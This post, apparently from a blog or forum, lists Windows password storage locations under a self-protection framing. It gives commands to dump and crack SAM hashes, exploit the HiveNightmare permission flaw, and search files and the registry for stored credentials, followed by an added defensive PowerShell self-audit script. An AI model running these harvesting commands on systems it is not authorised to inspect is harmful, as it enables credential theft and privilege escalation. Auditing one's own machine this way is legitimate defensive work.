Protecting yourself by checking your own password vulnerabilities.
Posted Jan 21, 2025 12:59 PM
For Windows, by default your passwords might be stored in some of the areas below, so check for yourself and make sure it isn't easy for someone to gain that info.
SAM is a database file where user passwords are stored in a hashed format in the registry, either as an LM hash or as an NTLM hash.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
If you can get to these files, generate a hash file for John using pwdump (or samdump2):
pwdump SYSTEM SAM > /root/john.txt
samdump2 SYSTEM SAM -o john.txt
Then crack it with John:
john -format=NT /root/john.txt
HiveNightmare
CVE-2021-36934 allows you to retrieve all registry hives (SAM, SECURITY, SYSTEM) in Windows 10 and 11 as a non-administrator user.
This is an old vulnerability but you might get lucky; if the icacls output shows BUILTIN\Users with (RX) on config\SAM, non-admins can read the hive.
C:\Windows\System32> icacls config\SAM
config\SAM BUILTIN\Administrators:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Users:(I)(RX)
Or try LAPS
Extract HKLM\Software\Policies\Microsoft Services\AdmPwd from the Windows registry.
LAPS Enabled: AdmPwdEnabled
LAPS Admin Account Name: AdminAccountName
LAPS Password Complexity: PasswordComplexity
LAPS Password Length: PasswordLength
LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled
Search all files and content
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config 2>nul >> results.txt
findstr /spin "password" *.*
Search for a file with a certain filename
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config
where /R C:\ user.txt
where /R C:\ *.ini
Search the registry for passwords
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" # SNMP parameters
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # PuTTY clear text proxy credentials
reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
Passwords in unattend.xml
Location of the unattend.xml files.
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
Now locate these files with dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul and inspect their content.
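To check your own machine for the exposures listed above in one go (the SAM ACL from HiveNightmare, the Winlogon autologon password, and leftover unattend/sysprep answer files), here is an added self-audit script; it is not part of the original post, assumes an elevated Windows PowerShell 5.1+ session, and reports only whether an exposure exists, never the secret itself.

```powershell
# Added self-audit script (not from the original post). Each check mirrors a
# location named in the post; run elevated so Get-Acl can read the SAM ACL.
$findings = @()

# 1. HiveNightmare (CVE-2021-36934): BUILTIN\Users must not have read access to the SAM hive.
$sam = Join-Path $env:SystemRoot 'System32\config\SAM'
$acl = Get-Acl -Path $sam -ErrorAction SilentlyContinue
if ($acl) {
    foreach ($ace in $acl.Access) {
        if ($ace.IdentityReference -eq 'BUILTIN\Users' -and
            $ace.AccessControlType -eq 'Allow' -and
            ($ace.FileSystemRights -band [System.Security.AccessControl.FileSystemRights]::ReadData)) {
            $findings += 'SAM hive readable by BUILTIN\Users (HiveNightmare exposure)'
        }
    }
}
# Shadow copies keep the old over-permissive ACL even after the live file is fixed.
$shadows = Get-CimInstance -ClassName Win32_ShadowCopy -ErrorAction SilentlyContinue
if ($shadows) { $findings += "Volume shadow copies present: $(@($shadows).Count) (SAM ACL inside them may still be weak)" }

# 2. Winlogon autologon: DefaultPassword holds the logon password in clear text.
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$props = Get-ItemProperty -Path $winlogon -ErrorAction SilentlyContinue
if ($props -and -not [string]::IsNullOrEmpty($props.DefaultPassword)) {
    $findings += "Winlogon DefaultPassword is set for user '$($props.DefaultUserName)'"
}

# 3. Unattend / sysprep answer files left behind after deployment.
$answerFiles = @(
    'C:\unattend.xml',
    "$env:SystemRoot\Panther\Unattend.xml",
    "$env:SystemRoot\Panther\Unattend\Unattend.xml",
    "$env:SystemRoot\System32\sysprep.inf",
    "$env:SystemRoot\System32\sysprep\sysprep.xml"
)
foreach ($file in $answerFiles) {
    if (Test-Path -LiteralPath $file) {
        # Flag the presence of a password element; the value itself is never printed.
        $hasPassword = Select-String -Path $file -Pattern '<Password>|AdministratorPassword|Password=' -Quiet
        $note = if ($hasPassword) { ' (contains a password element)' } else { '' }
        $findings += "Answer file present: $file$note"
    }
}

if ($findings.Count -eq 0) { 'No exposures found in the checked locations.' }
else { $findings | ForEach-Object { "FINDING: $_" } }
```

Any FINDING line is something to fix: restore the default SAM ACL and delete stale shadow copies, remove DefaultPassword from Winlogon, and delete answer files once deployment is done.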
There might be a few other places where the passwords are stored as well, but these are the easiest to get to from my experience. I'm still learning myself, so if I'm missing any others please let me know.